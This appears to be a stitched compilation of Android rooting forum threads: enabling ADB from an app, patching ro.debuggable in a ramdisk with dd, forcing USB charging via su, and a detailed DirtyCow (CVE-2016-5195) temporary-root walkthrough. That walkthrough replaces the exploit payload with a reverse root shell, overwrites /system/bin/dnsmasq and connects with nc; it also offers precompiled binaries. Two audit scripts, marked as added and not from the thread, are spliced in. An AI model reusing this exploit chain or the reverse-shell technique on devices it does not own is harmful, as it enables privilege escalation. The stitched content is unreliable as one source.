Hello again, and thanks in advance for all your help.
Without going into excessive detail about my project, here is what I need to accomplish:
I want to be able to turn on USB Debugging (ADB) from within my app. For simplicity, let's just say I want to create a clone of the developer settings page, where a checkbox can turn USB Debugging on and off.
I know this can be done through terminal applications by typing:
Code:
setprop persist.service.adb.enable 1
Currently, my code is trying something like this:
Code:
Process process = Runtime.getRuntime().exec(
new String[]{"setprop", "persist.service.adb.enable", "1"});
This isn't giving me any errors or exceptions, but it is also not changing the value. I assume this is a permission issue. I know this isn't designed to be allowed by Android for security reasons, and this isn't an app that I will try and release. This is just for a single-purpose device, (a Galaxy Tab if that is relevant).
My goal here is to NOT have to enable permanent root on the device. I am able to accomplish what I'm attempting by rooting the device, and calling "su" before my setprop commands. For security reasons, I would prefer to NOT have su even available on the device. I am hoping that I can make whatever changes I need during a temporary root (using rageagainstthecage method) and then not have root after the device is restarted.
I'm fairly new to Linux, so all of my knowledge of it is limited to what I have learned from Android and my rooting experience. I was thinking that if I made a shell script that called setprop for me, I could somehow give that permission to run as root, and simply run that script from my app? The script would be something very simple like this:
Code:
echo Running ENABLE Debugging Script
setprop persist.service.adb.enable 1
Then I could call it from my app with:
Code:
Process process = Runtime.getRuntime().exec(
new String[]{"/pathToScript/enableDebugScript.sh"});
Does anyone know how (I assume through use of CHMOD?) I could give this script permission to run as root? Or is there a better way to execute shell commands with elevated privileges from within a standard Android application?
Thanks for all the help, let me know if I can clarify anything. As always, I appreciate the assistance.
hello!!
is there someone that managed to obtain root access? if that's true, please tell me what method you used and how it went...
Root Access is quite easy to Achieve.
[GUIDE] All Tattoo questions and answers see here (from A to Z)!
http://forum.xda-developers.com/showthread.php?t=716282
1. How can I root my phone?
1.1 General information/Basic adb-commands
Rooting a phone enables you to do things, which normally aren't possible for the average user like:
- Removing apps which were preinstalled by the provider (like Orange, Vodafone, etc.). My Tattoo had Vodafone apps for buying music and other sh*t, which was installed on the system partition (to which a "normal" user has no rights to write to, including deleting).
The Tattoo was successfully rooted by a bunch of guys here, namely -bm-, mainfram3 and Coburn64 (maybe, I don't remember quite correctly ). Also the Tattoo was the first phone having a security mechanism hindering a user to mount the filesystems as read/write, which had to be overridden by remapping the read only memory region to a read/write one. This is done by the module Tattoo-hack.ko, also made by mainfram3. He also created the first boot.img, which enabled su directly from adb and loading Tattoo-hack directly from boot on.
A few words about adb:
ADB is a tool for communicating from the PC with the mobile phone. For this a service is running on the phone enabling the communication via Terminal Emulator. Here are the most useful adb-commands:
Code:
adb push localFileFromPC /path/on/mobilephone
-> pushes a file "localFileFromPC" to a specified location on the phone
adb pull /path/to/file pathFromPC
-> receives a file from the phone and stores it to "pathFromPC"
adb remount
-> This is only possible in custom ROMs, remounts the file system to r/w automatically
adb shell "command"
-> executes "command" and returns to the computer shell
adb shell
-> opens a shell session on the phone (from here on you have to be very careful! Also you can execute now normal linux commands like rm, mv, ls, chmod and so on, but not cp (this can be done through busybox)). You will have to use this more often, so get used to it ;)
Discovering "adb shell" gave joy, experiencing the shell as minimal bash with awful line handling (backspace and command recall) gave annoyance, experiencing "adb root" refusing access gave frustration.
After some tracking, it turns out that adbd behaviour is determined by the property "ro.debuggable" which is set during system init. The initial value is located in the file "/default.prop". In JP6 it is set to 0, resulting in adbd refusing access. However, set to 1, "adbd root" will give the much better response of "restarting adbd as root".
Once set, the property value cannot be changed. To get this fixed you need to change the contents of the file default.prop which is located in the initial ramdisk image.
Optionally, you can put a replacement shell in /sbin of the ramdisk image so that when connected "exec bash" will make things more relaxing. I attached the version I am using, which is statically linked with ncurses/readline.
There is also a simple patch to unlock adbd if you dislike opening and rebuilding the ramdisk image. However, you do need binoffset which is located in the scripts directory of the linux source tree.
Code:
ofs=`scripts/binoffset initramfs.cpio \`echo -n 'debuggable=0' | od -t u1 -An\` 2>/dev/null`
echo 'debuggable=1' | dd bs=1 seek=$ofs conv=notrunc of=initramfs.cpio
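For anyone checking a ramdisk or a device image rather than modifying it, the properties discussed above can be audited with a short script. This is an added example, not part of the original post: the function names and the sample text are constructed, and `ro.secure` is a standard Android property that the thread itself does not mention.

```shell
#!/bin/sh
# Added example (not from the thread): audit default.prop-style text for
# properties that open up adbd. Reads key=value lines on stdin.
audit_props() {
    awk '
        /^[ \t]*#/ || !/=/ { next }    # skip comments and malformed lines
        {
            key = substr($0, 1, index($0, "=") - 1)
            val = substr($0, index($0, "=") + 1)
            gsub(/[ \t\r]/, "", key)
            gsub(/^[ \t]+|[ \t\r]+$/, "", val)
            # ro.* properties are write-once: the first assignment sticks.
            if (key ~ /^ro\./ && (key in seen)) next
            seen[key] = val              # other properties: last write wins
        }
        END {
            if (seen["ro.debuggable"] == "1")
                print "HIGH ro.debuggable=1 (adbd will honour adb root)"
            if (seen["ro.secure"] == "0")
                print "HIGH ro.secure=0 (adbd does not drop root)"
            if (seen["persist.service.adb.enable"] == "1")
                print "INFO persist.service.adb.enable=1 (USB debugging on)"
        }'
}

# Constructed sample, not taken from any real device image.
sample_props() {
    cat <<'EOF'
# ADDITIONAL_DEFAULT_PROPERTIES
ro.secure=1
ro.debuggable=1
ro.debuggable=0
persist.service.adb.enable=0
persist.service.adb.enable=1
EOF
}

sample_props | audit_props
```

On a live device the same function can be fed from `adb shell cat /default.prop`.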
Thanks...any help though?
Hi....thanks for the fix....could you point me to a decent howto on editing the initial ramdisk?
Thanks
M
it doesn't sound simple
i will try to figure that one out ...
Dear Hexabit,
I know it's an old topic.
But do you know how can I use this Fix on a windows 7?
tried searching for binoffset software/script..couldn't find anything
I have a Flytouch 3 tablet, rooted(Z4) with terminal emulator and root explorer.
is there a way to use your bash.rar to unlock adb access?
thanks for the help
doekoe87 said:
Dear Hexabit,
I know it's an old topic.
But do you know how can I use this Fix on a windows 7?
tried searching for binoffset software/script..couldn't find anything
I have a Flytouch 3 tablet, rooted(Z4) with terminal emulator and root explorer.
is there a way to use your bash.rar to unlock adb access?
thanks for the help
you have to split the kernel, then decompile the ramdisk and edit default.prop and change ro.debuggable to 1, then recompile and flash
confuse but giving me a clue
I use unpackbootimg in my ubuntu pc.
The adb root works not properly after set debuggable=1.
When I saw your thread that told the adbd should be unlocked too, then I replace the adbd with an unlocked one. It works!
Thanks for your help.
I am sorry but I don't understand how to use the file.
teoking said:
I use unpackbootimg in my ubuntu pc.
The adb root works not properly after set debuggable=1.
When I saw your thread that told the adbd should be unlocked too, then I replace the adbd with an unlocked one. It works!
Thanks for your help.
Hi,
I can upload nothing to my root catalog of my phone.
So how could I use the adbd file in this case?
Phone is rooted but I have a problem with adb root command like subject of this topic is.
Can u help me with the process because I kept the file in /sbin but still it's not working.
Active system
Hi guys,
could anyone explain me please how to enable usb charging with Pershoot´s Kernel (boot-cm_2636.4_ux-oc-xtra-vfpv3-d16_fp-101811)?
I rly don´t get this:
adb shell echo 1 > /sys/class/power_supply/battery/force_usb_charging
Thank you very much.
Sure bud,
The script you posted is meant to be run in a command prompt using the tablet's ADB interface. To access this you need the Android SDK (that is the tool for app development) installed on your PC. You can look up how to do this all over the interweb.
To make your life easier though, download a terminal emulator app from the Market, there are plenty of free ones. Once you've done that open it and run the script as follows
su
echo 1 > /sys/class/power_supply/battery/force_usb_charging
The "su" command gives you root access just as "adb shell" would in command prompt.
The catch is the script is not persistent after reboot. So you will need to run it again if you reboot the tab. This doesn't really bother me cause I only use it for charging in the car and it takes like 30 seconds to type in the script.
Enjoy!
Thank you very much!
Now it´s working.
FillTheVoid said:
Sure bud,
The script you posted is meant to be run in a command prompt using the tablet's ADB interface. To access this you need the Android SDK (that is the tool for app development) installed on your PC. You can look up how to do this all over the interweb.
To make your life easier though, download a terminal emulator app from the Market, there are plenty of free ones. Once you've done that open it and run the script as follows
su
echo 1 > /sys/class/power_supply/battery/force_usb_charging
The "su" command gives you root access just as "adb shell" would in command prompt.
The catch is the script is not persistent after reboot. So you will need to run it again if you reboot the tab. This doesn't really bother me cause I only use it for charging in the car and it takes like 30 seconds to type in the script.
Enjoy!
how do you make it stick ?
I ask this question in another forum and the result was, it´s not possible (maybe wrong).
By the way, after I enable USB charge, my notebook can´t find my Tab anymore.
Mondfahrer said:
I ask this question in another forum and the result was, it´s not possible (maybe wrong).
By the way, after I enable USB charge, my notebook can´t find my Tab anymore.
I found a way to very easily get it running.
download terminal emulator.
Go to system preference of terminal emulator and there is an option to enter an initial command to run after you start terminal emulator.
so just type in:
su - root
echo 1 > /sys/class/power_supply/battery/force_usb_charging
Whenever you start terminal emulator, it will enable usb charging
I use this app to NTSF http://forum.xda-developers.com/showpost.php?p=13337600&postcount=6
Many of the root tools/apps such as screencast, Helium... allow an option to start a background service through adb shell, and then connect to this service to execute commands with elevated permissions.
My idea is around generalizing this experience. There is only one app that starts a background service and acts as a proxy for all other apps (like the SuperSu app).
To make this interaction compatible with all root apps, I was thinking of writing a shell script "su" which redirects all the arguments to the above service.
This will give users with non-rooted devices access to many of the root apps.
But this will require the "su" script to be in the $PATH directory.
[Q] Is there a way to change the $PATH variable from adb shell (without root) so that it is retained system-wide? Any alternatives?
Further research proves this has been done before, although perhaps not on our device. While root in a technical sense, it's severely SElinux-limited & thus not of significant utility as it is. I've made some inroads re. patching init going toward full root, but nothing certain yet. Either way, what exists should be enough to get us to an unlocked bootloader if we can get our hands on the right CID & aboot.
------
This is how I achieved temproot on the P605V. This is not a permanent root as, since our tablets run a Samsung eMMC and are/should be vulnerable to the eMMC bug, if we have the right CID and aboot & if my understanding is correct, we can convert these to developer units and unlock their bootloader!
What this basically does is downgrade to a dirtycow-vulnerable kernel & launch a temporary root shell. At the moment it can't do much as it runs within dnsmasq's SElinux context, but it's a start.
This does not apply if you're on 4.4.2, there are probably better rooting methods then. Do not upgrade to 5.1.1 in that case as you will burn fuses and will be unable to downgrade back to 4.4.2.
However, we can still crossflash between 5.1.1 versions! For our tablet, there are two: P605VVRSDPL1 (latest, patched) and P605VVRUDOH2 (earlier, unpatched). You must downgrade to P605VVRUDOH2. You will need the P605VVRUDOH2 tar.md5 and Odin - this is covered extensively for every Samsung device (including the non-VZW version of ours) so I will not repeat it here.
Once you're on P605VVRUDOH2, go through the initial setup, enable Developer Tools, then enable ADB.
The manual process (compiling from source):
You will need to obtain the following (on Linux, not tested on Windows):
- the Android 22 NDK
- https://github.com/timwr/CVE-2016-5195
- https://github.com/freddierice/trident
0. If you don't yet have it installed, install the Android NDK. I don't usually compile for Android, so I installed Android Studio from https://developer.android.com/studio/#downloads and added NDK 22 from its menus. You can likely (and perhaps should) use an earlier NDK, such as 14 or 15. Your mileage may vary.
1. Extract CVE-2016-5195 and trident
2. In CVE-2016-5195, rename 'run-as.c' to 'old-run-as.c'
3. Copy 'reverse.c' from trident into CVE-2016-5195
4. In CVE-2016-5195, rename the copied 'reverse.c' to 'run-as.c' - we're basically replacing the original payload from CVE-2016-5195 with a reverse shell from trident
5. Edit the Makefile and replace the 'root: push' section as follows:
root: push
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/$(ARCH)/run-as /data/local/tmp/run-as
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/dnsmasq'
6. Run 'make root'
7. On the tablet, go into Settings -> More networks -> Mobile Hotspot, and turn it on. You will need a SIM card to do this, any SIM will do - even if the device is still Verizon-locked. As we've written our reverse root shell spawning code into dnsmasq, and dnsmasq runs as root, our shell will run as root as well!
8. Verify it worked by running 'adb shell' and running 'netstat' - you should see a process listening on 0.0.0.0:4040. That's our shell! If you run 'ps' you should also see /system/bin/dnsmasq followed by /system/bin/shell, both running as root.
9. Run 'adb forward tcp:4040 tcp:4040'
10. Run netcat to connect to the shell: 'nc localhost 4040' (on Windows, you can get a precompiled netcat binary from http://nmap.org/dist/ncat-portable-5.59BETA1.zip )
11. Profit!
The precompiled process (easier, binaries attached to this post):
1. Download and unzip the attached package.
2. Open up a shell/command prompt, change into the directory you unzipped the files into, and run:
adb push dcow /data/local/tmp/dcow
adb push rshell /data/local/tmp/rshell
adb shell 'chmod 777 /data/local/tmp/*'
adb shell '/data/local/tmp/dcow /data/local/tmp/rshell /system/bin/dnsmasq'
3. On the tablet, go into Settings -> More networks -> Mobile Hotspot, and turn it on. You will need a SIM card to do this, any SIM will do - even if the device is still Verizon-locked. As we've written our reverse root shell spawning code into dnsmasq, and dnsmasq runs as root, our shell will run as root as well!
4. Verify it worked by running 'adb shell' and running 'netstat' - you should see a process listening on 0.0.0.0:4040. That's our shell! If you run 'ps' you should also see /system/bin/dnsmasq followed by /system/bin/shell, both running as root.
5. Run 'adb forward tcp:4040 tcp:4040'
6. Run netcat to connect to the shell: 'nc localhost 4040' (on Windows, you can get a precompiled netcat binary from http://nmap.org/dist/ncat-portable-5.59BETA1.zip )
7. Profit!
Keep in mind, this is only temporary; a reboot will clear it and you'll have to exploit again. It is also not an extensive root as my end goal is to unlock the bootloader and get rid of the (awful) stock firmware.
Credits to timwr and all involved in the dirtycow exploit, freddierice for trident, as well as everyone on XDA whose research and comments over the past 4 years pointed me in the right direction. This tablet is still quite decent in 2020/2021, it deserves to be "free"!
----
As I understand it, as per @beaups https://github.com/beaups/SamsungCID & SamDunk, we will need two things - I hope someone in the community will volunteer these!
1. A dev-edition CID
2. An aboot dump from a dev-edition P605V (I'm not sure the regular P605 will work)
@ryanbg has made much inroad here as well. All input/assistance is appreciated!
Should these turn out to be unobtainium in some time, I will look into a permanent root solution.
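The verification step in the post above (a shell appearing directly under /system/bin/dnsmasq in `ps`, both as root) is also a usable detection signal for anyone monitoring such devices. This is an added example, not part of the original post: it flags any process whose parent is dnsmasq, on the assumption that dnsmasq has no child processes on the device, and the `ps` listing is constructed sample data in the older Android column layout.

```shell
#!/bin/sh
# Added example (not from the thread): flag processes whose parent is dnsmasq.
# Reads Android `ps` output on stdin: USER PID PPID ... NAME (NAME is last).
find_dnsmasq_children() {
    awk '
        NR == 1 && $1 == "USER" { next }     # skip the header row
        NF >= 4 { user[$2] = $1; ppid[$2] = $3; name[$2] = $NF }
        END {
            for (pid in name) {
                p = ppid[pid]
                # parent must be known, be dnsmasq, and the child must not be
                if ((p in name) && name[p] ~ /(^|\/)dnsmasq$/ &&
                    name[pid] !~ /(^|\/)dnsmasq$/)
                    printf "%s pid=%s user=%s parent=%s\n",
                           name[pid], pid, user[pid], p
            }
        }' | sort
}

# Constructed sample listing, not captured from a real device.
sample_ps() {
    cat <<'EOF'
USER     PID   PPID  VSIZE  RSS   WCHAN    PC         NAME
root      1     0     1234   640   ffffffff 00000000 S /init
root      212   1     9876   1200  ffffffff 00000000 S /system/bin/netd
root      3101  212   2100   700   ffffffff 00000000 S /system/bin/dnsmasq
root      3102  3101  1500   500   ffffffff 00000000 S /system/bin/sh
shell     3200  180   1400   480   ffffffff 00000000 S /system/bin/sh
EOF
}

sample_ps | find_dnsmasq_children
```

Pair the result with a check for unexpected listeners in `netstat`, such as the 0.0.0.0:4040 socket the post describes.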